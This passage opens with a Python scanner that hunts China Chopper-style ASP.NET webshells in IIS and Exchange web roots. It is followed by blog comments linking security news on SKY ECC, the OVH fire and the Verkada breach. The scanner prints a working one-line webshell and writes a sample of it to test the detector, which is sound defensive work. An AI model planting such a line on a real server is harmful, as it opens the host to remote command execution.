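#   <%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>
# The pattern is an assumption based on the publicly documented form;
# it tolerates whitespace and Form/QueryString in place of Item.
CHOPPER_RE = re.compile(
    r'eval\s*\(\s*Request\.(?:Item|Form|QueryString)\s*'
    r'\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)',
    re.IGNORECASE,
)

# Server-side script extensions worth scanning under an IIS web root.
SCRIPT_EXTS = (".aspx", ".ashx", ".asmx", ".asax")


def is_chopper_like(content: str) -> bool:
    """Return True if the text contains the eval(Request...,"unsafe") shape."""
    return CHOPPER_RE.search(content) is not None


def scan_tree(root: Path) -> list[str]:
    """Walk a web root and return POSIX-style relative paths of suspicious scripts."""
    hits = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue  # unreadable file: skip rather than abort the hunt
        if is_chopper_like(text):
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def demo() -> list[str]:
    """Build a constructed sample web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        site = root / "site"
        site.mkdir()
        # Benign page: normal ASP.NET directive, no eval of request data.
        (site / "logon.aspx").write_text(
            '<%@ Page Language="C#" %>\n<html><body>login</body></html>'
        )
        # Constructed webshell sample with a placeholder parameter name.
        (site / "shell_example.aspx").write_text(
            '<%@ Page Language="Jscript"%>'
            '<%eval(Request.Item["demo_pw"],"unsafe");%>'
        )
        # Same text in a non-script file: not executable by IIS, so ignored.
        (site / "notes.txt").write_text('eval(Request.Item["x"],"unsafe")')
        return scan_tree(root)


if __name__ == "__main__":
    for hit in demo():
        print("suspicious:", hit)
```

In practice you would point `scan_tree` at the Exchange and IIS web roots and correlate each hit with file creation time and the IIS request logs, since the metadata around a dropped file is exactly the kind of incidental artifact the Unit 42 post analyzes.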
Tomi Engdahl says:
https://www.securityweek.com/researchers-show-first-side-channel-attack-against-apple-m1-chips
Tomi Engdahl says:
https://www.securityweek.com/latest-mass-hacks-highlight-challenge-biden-administration
Tomi Engdahl says:
https://www.securityweek.com/f5-patches-four-critical-bugs-big-ip-suite
Tomi Engdahl says:
European Police Pounce After Cracking Crime Chat Network
https://www.securityweek.com/european-police-pounce-after-cracking-crime-chat-network
Police said Wednesday they had arrested at least 80 people and carried out hundreds of raids in two European countries after shutting down an encrypted phone network used by organised crime groups.
Belgian, Dutch and French police said they hacked into the SKY ECC network, allowing them to look “over the shoulders” of suspects as they communicated with customised devices to plot drug deals and murders.
“During an action day on Tuesday, large numbers as well as numerous house searches and seizures were made in Belgium and the Netherlands,” Europol and its judicial twin agency Eurojust, said in a statement.
In France, law officials have identified some 2,000 users of SKY ECC “allowing for procedures to be opened relating to large-scale drug operations and attacks on people,” the Paris prosecutor said.
“The network we are dealing with seems to be almost exclusively used by large-scale criminals.”
Tomi Engdahl says:
Ax Sharma / BleepingComputer:
Data center operator OVH says a fire destroyed some of its sites in France, affecting cyber threat intelligence company Bad Packets, game maker Rust, and others — In a major unprecedented incident, data centers of OVH located in Strasbourg, France have been destroyed by fire.
OVH data center burns down knocking major sites offline
https://www.bleepingcomputer.com/news/technology/ovh-data-center-burns-down-knocking-major-sites-offline/
In a major unprecedented incident, data centers of OVH located in Strasbourg, France have been destroyed by fire.
OVH is the largest hosting provider in Europe and the third-largest in the world. The cloud computing company provides VPS, dedicated servers, and other web services.
Customers are being advised by the company to enact their disaster recovery plans after the fire has rendered multiple data centers unserviceable, impacting websites around the world.
Fire destroys Strasbourg data centers
OVH, the world’s third-largest and Europe’s largest hosting provider has been impacted by a disaster.
Its French data centers, SBG1, SBG2, SBG3, and SBG4 located in Strasbourg were shut down to contain the damage from a fire that started in SBG2.
Major sites knocked offline, more expected
As a result of this incident major customers of OVH state their web services are inaccessible.
The list of impacted clients includes cyber threat intelligence company Bad Packets, provider of free chess server Lichess.org, videogame maker Rust, cryptocurrency exchange Deribit’s blog and docs sites, telecom company AFR-IX, encryption utility VeraCrypt, news outlet eeNews Europe, the art building complex Centre Pompidou, and many others.
Deribit has clarified to BleepingComputer that the outage only impacted their docs and blog sites and that the exchange was never down.
Although according to the OVH founder and chairman Octave Klaba, the fire has been contained as of early hours of March 10th, 2021, services are expected to remain unavailable at least for today.
“Fire is over. Firefighters continue to cool the buildings with the water.”
“We don’t have the access to the site. That is why SBG1, SBG3, SBG4 won’t be restarted today,” said Klaba.
Customers should immediately bring into effect their disaster recovery plans as OVH is working on restoring its services.
Tomi Engdahl says:
https://etn.fi/index.php/13-news/11869-f-secure-palkittiin-parhaasta-suojauksesta
Tomi Engdahl says:
Bloomberg:
Three former employees say that 100+ employees at Verkada could view the camera feeds of its thousands of customers via widely used super admin accounts. Former employee said issue was raised with Verkada executives. Hackers gained access to 150,000 customer camera feeds.
Verkada Workers Had Extensive Access to Private Customer Cameras
https://www.bloomberg.com/news/articles/2021-03-11/verkada-workers-had-extensive-access-to-private-customer-cameras
Former employee said issue was raised with Verkada executives
Hackers gained access to 150,000 customer camera feeds
More than 100 employees at security camera startup Verkada Inc. could peer through the cameras of its thousands of customers, including global corporations, schools and police departments, according to three former employees aware of the company’s security protocols.
Verkada was breached on Monday, when hackers gained access to what’s known as a “Super Admin” account that allowed them to see all of the live feeds and archived videos of Verkada’s customers, Bloomberg reported. With access to 150,000 cameras, the hackers were able to see inside Tesla Inc., as well as watch police interviews and witness hospital employees tackling a patient.
The use of Super Admin accounts within Verkada was so widespread that it extended even to sales staff and interns, two of the employees said. “We literally had 20-year-old interns that had access to over 100,000 cameras and could view all of their feeds globally,” said one former senior-level employee, who asked not to be identified discussing private information.